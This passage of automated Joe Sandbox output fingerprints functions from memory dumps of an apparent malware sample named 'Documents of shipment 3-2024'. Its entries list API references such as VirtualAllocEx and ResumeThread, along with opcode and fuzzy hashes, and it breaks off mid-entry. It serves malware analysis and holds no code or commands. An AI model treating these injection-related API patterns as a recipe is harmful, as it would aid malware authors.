                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 6844d139e20e861b3d83b66c5766c157b261edb7ca013f048b0c8c5ecfbe6cfd
                                              • Instruction ID: aa7d87468e71c821c6b65baf21d84dd00c32595e6ca54f873ee38e6591a612a2
                                              • Opcode Fuzzy Hash: 6844d139e20e861b3d83b66c5766c157b261edb7ca013f048b0c8c5ecfbe6cfd
                                              • Instruction Fuzzy Hash: C2111776D003499FDB24DFAAC844BEEBBF5EF48310F148419E965A7250C7759941CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 067B225E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: d826887e195052a6157b6eecc7cb8d749417fbea144bca756c8076775726afa4
                                              • Instruction ID: 5cdedfd45e674ad63e4dd811b61287a77364d933cc1d93d82e216d27ae18f2a8
                                              • Opcode Fuzzy Hash: d826887e195052a6157b6eecc7cb8d749417fbea144bca756c8076775726afa4
                                              • Instruction Fuzzy Hash: 4F113776D003499FDB24DFAAC844BEEBBF5EF48320F248419E925A7250C775A941CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 35203a5a028bc20237b839cf19688f9cd7ba81c477ea37033a0a486d85417d86
                                              • Instruction ID: a2b552ad2cc190577a256acd5f7dfbbc6854994c830f73a819a92a5d99c4e8bd
                                              • Opcode Fuzzy Hash: 35203a5a028bc20237b839cf19688f9cd7ba81c477ea37033a0a486d85417d86
                                              • Instruction Fuzzy Hash: D5115BB1D003488FDB24DFAAC4457EEFBF5EF88314F248429C959A7240C6796945CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,04A5EC71,?,?), ref: 04A5EE18
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249349167.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4a50000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: 41b72e73da6c0a3b7de64f1a8a96fb48ad235d28df061c87000610e09468d5d5
                                              • Instruction ID: e053041c714cadd518e6c13d8a408d13159e4a40340be856eff77cab14d0615c
                                              • Opcode Fuzzy Hash: 41b72e73da6c0a3b7de64f1a8a96fb48ad235d28df061c87000610e09468d5d5
                                              • Instruction Fuzzy Hash: 5C1128B6800349DFDB10DF9AC545BEEBBF4EB48320F108429D958A7250D378A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: d9d6e314332c7cc88479eda62b291e44725a2ec3833a28b6695f3d9a22325209
                                              • Instruction ID: 83170ea555e09b510b3aec918297f8e422146ca5a23b84bb56fd45e11121de22
                                              • Opcode Fuzzy Hash: d9d6e314332c7cc88479eda62b291e44725a2ec3833a28b6695f3d9a22325209
                                              • Instruction Fuzzy Hash: CF113AB1D003498FDB24DFAAC4457EEFBF5EF88220F248429D519A7240CB796945CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0228D57E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 97a6e6d90f1ec9943cfc72da30721c238a184236d12890eab0e81e1b538d0f8d
                                              • Instruction ID: 175bc06c6c4ff5a7185f808dbd1005dd4eed2a4dfcf39e7248d87cc679253393
                                              • Opcode Fuzzy Hash: 97a6e6d90f1ec9943cfc72da30721c238a184236d12890eab0e81e1b538d0f8d
                                              • Instruction Fuzzy Hash: F91110B6C013498FCB20DFAAD444BDEFBF4EF88214F10842AD828A7640D379A545CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 067B4D85
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: b11620ac1b335b7ee73507f398a604166526a229d7aede3c5e12942d581b5efc
                                              • Instruction ID: 9fad87da61226f1fb087c5e28e0062be9bf2b6ac3e653465f2728c0db1b2cb5d
                                              • Opcode Fuzzy Hash: b11620ac1b335b7ee73507f398a604166526a229d7aede3c5e12942d581b5efc
                                              • Instruction Fuzzy Hash: 5711D6B5900349DFDB10DF9AD845BEEBBF8EB48314F208419E958A7205C375A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,04A5EC71,?,?), ref: 04A5EE18
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249349167.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4a50000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: 63be626600de90d7b5acf041c13fc581ab83ecf70bf0d8f7e8254f0efd983943
                                              • Instruction ID: 7fb6e323c0ce68f0ca4baaddd36bda8307b7702f1f090148cbd4693f1bbfc9f7
                                              • Opcode Fuzzy Hash: 63be626600de90d7b5acf041c13fc581ab83ecf70bf0d8f7e8254f0efd983943
                                              • Instruction Fuzzy Hash: 04113AB5C00359CFDB10DF99C1457EEBBF0EB48320F10841AD958A7250D378AA44CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 067B4D85
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: dbf128b98239300585c7a260a1035603e950bda1b2d01b4ede2398dff7712956
                                              • Instruction ID: e2b042b56a8d5d71023d03d28c303807f86e82d62840513520752b74fd6844d6
                                              • Opcode Fuzzy Hash: dbf128b98239300585c7a260a1035603e950bda1b2d01b4ede2398dff7712956
                                              • Instruction Fuzzy Hash: F51103B58003499FDB20DF9AD945BEEBBF8EB48320F248419E958A7200C375A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Teq
                                              • API String ID: 0-1098410595
                                              • Opcode ID: f8e0426e0670a07f74314c344e83e6a9d7e1ac9e7954dc42adcfa87cfbf91ded
                                              • Instruction ID: 5ec7d29f862414b37f3b97a878b91463e6026e4454abc4d7bb1ec80be3eeee7c
                                              • Opcode Fuzzy Hash: f8e0426e0670a07f74314c344e83e6a9d7e1ac9e7954dc42adcfa87cfbf91ded
                                              • Instruction Fuzzy Hash: 3251E171B003059FDB00EBB9D8889BEBBF7EFC42217148969E459D7395EB309D0687A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8q
                                              • API String ID: 0-4083045702
                                              • Opcode ID: 554baa65109644f3f662b9249b1db111b800050c5f6ae56c3a1247d322f3444a
                                              • Instruction ID: 0bcba0fd636f0e8cdfead93e098b9e0a6690bd52f89c418f67230b3e75c5404b
                                              • Opcode Fuzzy Hash: 554baa65109644f3f662b9249b1db111b800050c5f6ae56c3a1247d322f3444a
                                              • Instruction Fuzzy Hash: 3951B374E45209DFCB00DFA9D480AADBBF5FB49701F20952AE816BB355E7309946CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8q
                                              • API String ID: 0-4083045702
                                              • Opcode ID: b1c7cc33ae0d71a9145d314d61a490f688a73528401dfcc2f3c148af102f5bac
                                              • Instruction ID: d218fc4b113929405118b7913a91f05772b398d9bc52046a77442e8c43c1d6aa
                                              • Opcode Fuzzy Hash: b1c7cc33ae0d71a9145d314d61a490f688a73528401dfcc2f3c148af102f5bac
                                              • Instruction Fuzzy Hash: 3D51A374E45209DFCB04DFA8D580AADBBF1FB49701F20952AE816BB355E7309946CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: p
                                              • API String ID: 0-2181537457
                                              • Opcode ID: 2ae2458faa07654ec985312bee277b7f31595c2a1826206c33dfb9f38ec2b919
                                              • Instruction ID: cf104840d33484bbf5cf93f39de90dac1df4682cd541026ea96f9ad62df19371
                                              • Opcode Fuzzy Hash: 2ae2458faa07654ec985312bee277b7f31595c2a1826206c33dfb9f38ec2b919
                                              • Instruction Fuzzy Hash: CC41AF74D49209DFCF00DFA8D984AEDBBF4AB09615F10956AE81AF7304E7349A41CF25
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2(8x
                                              • API String ID: 0-75087259
                                              • Opcode ID: d42022eabc8870b4e44fe3d29fb8eea535189424c41802a65f8836eca1b410a9
                                              • Instruction ID: cb27e616485fc7712fb0bd57e2d588904f4024c85a7108e984790bd702e0b7ed
                                              • Opcode Fuzzy Hash: d42022eabc8870b4e44fe3d29fb8eea535189424c41802a65f8836eca1b410a9
                                              • Instruction Fuzzy Hash: 43417E35955205CFD710EF68E588B9C7BFAFB49202F00D1AAE009EB31ADB309945CF25
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %
                                              • API String ID: 0-2567322570
                                              • Opcode ID: 3198e3ea304b6a42c263b71c46ec97d43dd8d85ad4a42065de22f3dec484525d
                                              • Instruction ID: a5b7c821844c7e3fe523710519e3e692060edb4a6e04488f96be5e8a872749a7
                                              • Opcode Fuzzy Hash: 3198e3ea304b6a42c263b71c46ec97d43dd8d85ad4a42065de22f3dec484525d
                                              • Instruction Fuzzy Hash: CB312075908388DFDB15DFA4D9007DEBBB1AB86311F24449AE405A7262C3388E06CBB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: p
                                              • API String ID: 0-2181537457
                                              • Opcode ID: 8ab891abe0cd900e4c972d0d83ffdc385dae6068c41fd1643e0a0bf561516b82
                                              • Instruction ID: 12ae354d56548b0701cdd1bdd20d3a93f4ba6b73eb62721eef9b26cd04092b05
                                              • Opcode Fuzzy Hash: 8ab891abe0cd900e4c972d0d83ffdc385dae6068c41fd1643e0a0bf561516b82
                                              • Instruction Fuzzy Hash: AB419DB4D49209DFCF40DFA9D584AEDBBF4AB19615F10946AE80AF7304E3349A41CF24
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Teq
                                              • API String ID: 0-1098410595
                                              • Opcode ID: 1060f67ad850326c7f102e23ec36ed9c5e57a97b41ea5c178328d196d57d9dd1
                                              • Instruction ID: 4cf02b2bb01f57ba45c318527fbd7c910f62989e4a06fb9b45652989848967f6
                                              • Opcode Fuzzy Hash: 1060f67ad850326c7f102e23ec36ed9c5e57a97b41ea5c178328d196d57d9dd1
                                              • Instruction Fuzzy Hash: 8431AF70D45358CFEB45DFA5D8943DDBFF1AF89311F1880AAD404A72A5DB340A09CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $
                                              • API String ID: 0-3993045852
                                              • Opcode ID: f3e3f3b374595886f0ee6c6fed5787bb878f9a5387415e43e028e0838b001665
                                              • Instruction ID: 8b79df0abc443e698d18c389f9e1079ae0d540b41cc393bc50df5023baa194cf
                                              • Opcode Fuzzy Hash: f3e3f3b374595886f0ee6c6fed5787bb878f9a5387415e43e028e0838b001665
                                              • Instruction Fuzzy Hash: 3F213874A4D384EFCB06EBB08D1846D7FF9EF4220172404EBD846C7246EA348E069770
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Teq
                                              • API String ID: 0-1098410595
                                              • Opcode ID: 9b1c67493d185130ee023cfc0a38ec762a511b5455fcf8b679b16dfc889fbb67
                                              • Instruction ID: e427dee88f63c37a5ce60cff51c462afb8f31df6e5c1ef49968029a9b93b51c6
                                              • Opcode Fuzzy Hash: 9b1c67493d185130ee023cfc0a38ec762a511b5455fcf8b679b16dfc889fbb67
                                              • Instruction Fuzzy Hash: D131B174E00219DFCB04DFE9D884AEDBBB2FF89311F208129E919AB355C731A901DB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: p
                                              • API String ID: 0-2181537457
                                              • Opcode ID: 2aa3768e4b8648f4082c904d98fb414e939464b10e8b6d97659a7bf55dd66208
                                              • Instruction ID: bd5f80e6945f2720d05c6fdc859150610bcdfcfc6c028e0eba0700db72ecb93c
                                              • Opcode Fuzzy Hash: 2aa3768e4b8648f4082c904d98fb414e939464b10e8b6d97659a7bf55dd66208
                                              • Instruction Fuzzy Hash: 9B21D274E49209DFCF04DFAAD8806EDBBF1AF48611F14916AE80AF7304E73099428F64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Teq
                                              • API String ID: 0-1098410595
                                              • Opcode ID: 9ff9d306316009f3e4b8b83bf086f5470892c2cd5a5e0dee619a773a884d551c
                                              • Instruction ID: 258f5238f5ea6bc94f45ca073ef7456472e9c411adac320e813b25bb084e586b
                                              • Opcode Fuzzy Hash: 9ff9d306316009f3e4b8b83bf086f5470892c2cd5a5e0dee619a773a884d551c
                                              • Instruction Fuzzy Hash: 63114F31F4020A9BCB14EBB998106EEB7F2BF88312B104069C505EB344EB329D158BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2(8x
                                              • API String ID: 0-75087259
                                              • Opcode ID: a15431c3575b3e117bc3d217db664c9b09f2f5514960eb57f8b9e5bd0146f686
                                              • Instruction ID: dc7456bab3001f3629c6c7ec83930ee5e75f0bb85d346e68f865d6fea89c9856
                                              • Opcode Fuzzy Hash: a15431c3575b3e117bc3d217db664c9b09f2f5514960eb57f8b9e5bd0146f686
                                              • Instruction Fuzzy Hash: 29110938A45214CFE714EF64D948BA9BFB6FB88201F1091AAD909AB305DB309D81CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: '
                                              • API String ID: 0-1997036262
                                              • Opcode ID: f2563128ef8749eb57c93f17ccb86ef429a75d20c262850e9d665a7bbf21cb26
                                              • Instruction ID: 4ed7829293de266c88db42fe448295b77c1dc2fab5174f0876c3f1f2b3cb1e85
                                              • Opcode Fuzzy Hash: f2563128ef8749eb57c93f17ccb86ef429a75d20c262850e9d665a7bbf21cb26
                                              • Instruction Fuzzy Hash: A6F06D70A5A394CFC706EBB0D8157ADBFB09F4B202F1401DAD04AAB256C7700D40DF22
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: '
                                              • API String ID: 0-1997036262
                                              • Opcode ID: 585fc446f4394356ec08928439f3986d6be4a4b19a8e8f2f1baaa27bb7376353
                                              • Instruction ID: 227bf8fd3dafe11311c125df68212bb4c22d4e60331335bf2b5d114400ace14c
                                              • Opcode Fuzzy Hash: 585fc446f4394356ec08928439f3986d6be4a4b19a8e8f2f1baaa27bb7376353
                                              • Instruction Fuzzy Hash: 3AE0927095E384DFC705DBB0D91D26D7FB0AB43203F2584DAD00A57456CB780905DB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: 788a2fde585b30bac705d946fd8d4da0c5baa40aab7c2bb7ab42417342e60b35
                                              • Instruction ID: 1c7f6b1a4ec964d4074a9db0be8e06b904ed6e1e8a999418f9c89fb3d57211c2
                                              • Opcode Fuzzy Hash: 788a2fde585b30bac705d946fd8d4da0c5baa40aab7c2bb7ab42417342e60b35
                                              • Instruction Fuzzy Hash: 26E0DFB149A344DBCB03BBB0EE1A7683BFCAB13243F000887C8016715BD6B10A40DA72
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: 8c101e2794c22b17968e5700312177f8b7e9e6348966d960ca052e06b77508cf
                                              • Instruction ID: dd8b08d5f294b8f0593a6d0f76c9d076cd954f136beb252fb5a7eed164d4a4ed
                                              • Opcode Fuzzy Hash: 8c101e2794c22b17968e5700312177f8b7e9e6348966d960ca052e06b77508cf
                                              • Instruction Fuzzy Hash: 83D0A7300DB208D7C701FB60E50577D77BC8701203F00155A8C05131568BF61A40E976
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: '
                                              • API String ID: 0-1997036262
                                              • Opcode ID: 06bd461b916ebdc0c2e230212cf33d3e12e2169fbc67738324b89a1add8fde63
                                              • Instruction ID: 7b25d618c0d76ecdbab3b353ba407c92ddbf9bad63db4db29edfaafdd9eab307
                                              • Opcode Fuzzy Hash: 06bd461b916ebdc0c2e230212cf33d3e12e2169fbc67738324b89a1add8fde63
                                              • Instruction Fuzzy Hash: 7AD05E700AA208D7C600EBA0E8097AD7BB89746207F100055D40A13141CB740900DE66
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 791b3decaefe9a0de016d30b50ad3a0a94b307497fed1824f204e2638877c7fd
                                              • Instruction ID: 5dce0c028143f2af3eaad64b4087e8a569847a865b6efe8ddbd902dfd64aa67e
                                              • Opcode Fuzzy Hash: 791b3decaefe9a0de016d30b50ad3a0a94b307497fed1824f204e2638877c7fd
                                              • Instruction Fuzzy Hash: 5FA15D70E55219DBDB04EFA4D480ADDBBB5FF89310F10C615E41AAB34ADB30A945CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 09724bc841eeed3c24a1064395a7af4d9d8c0eda50fef3d95a23e567bc953786
                                              • Instruction ID: 29b948c7605dc982865806ae1cbd58c644a85b04f53c264d57f9e9e591f1498e
                                              • Opcode Fuzzy Hash: 09724bc841eeed3c24a1064395a7af4d9d8c0eda50fef3d95a23e567bc953786
                                              • Instruction Fuzzy Hash: 09A15D70E55219DFDB04DFA4D480AEDBBB6FF89310F108615E41AAB34ADB309946CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bc2628f09a6b52341d3edaf63fba49f6cb4037337a618b9941d7be4bfdfb507f
                                              • Instruction ID: 1596167f0eb5f053b46771b694fd2871cd896b44a46e9b501483fc2e09159667
                                              • Opcode Fuzzy Hash: bc2628f09a6b52341d3edaf63fba49f6cb4037337a618b9941d7be4bfdfb507f
                                              • Instruction Fuzzy Hash: 45518CB4E48208CFCB45DFA8D580AFEBBF5EB89301F109199E419A7396C7349A41CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d329da08696088fea3b7f74089a6095acb4243527804f2be62868870548b7f92
                                              • Instruction ID: f50226869f6d103a88c6eff786b27cfceef96fe0f0a8ea83c37362bd10567fdd
                                              • Opcode Fuzzy Hash: d329da08696088fea3b7f74089a6095acb4243527804f2be62868870548b7f92
                                              • Instruction Fuzzy Hash: C151D474E44219DFDB14DFA9D4809AEBBF2FB49311F54852AE816BB318D7309902CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8da9933cfb513d7fde2992d53d2eca3ca5a5baa8f3d743a2023cbefbfd87dbd6
                                              • Instruction ID: 12494512dceab49bd01a23b737331fe01c2eceb132467f0cfc913447c06c9efa
                                              • Opcode Fuzzy Hash: 8da9933cfb513d7fde2992d53d2eca3ca5a5baa8f3d743a2023cbefbfd87dbd6
                                              • Instruction Fuzzy Hash: 1651E374E44209DFDB14DFA8D9809AEBBF2FF49311F54852AE816AB354D7309902CF62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 87eca730be8b9c0247eeff3deca15e10b0407909f1b1819551da53218a7dd859
                                              • Instruction ID: 3bad31da3916e2bab865d833a8a94055b0fef5feaa1425313da184b87fde68bf
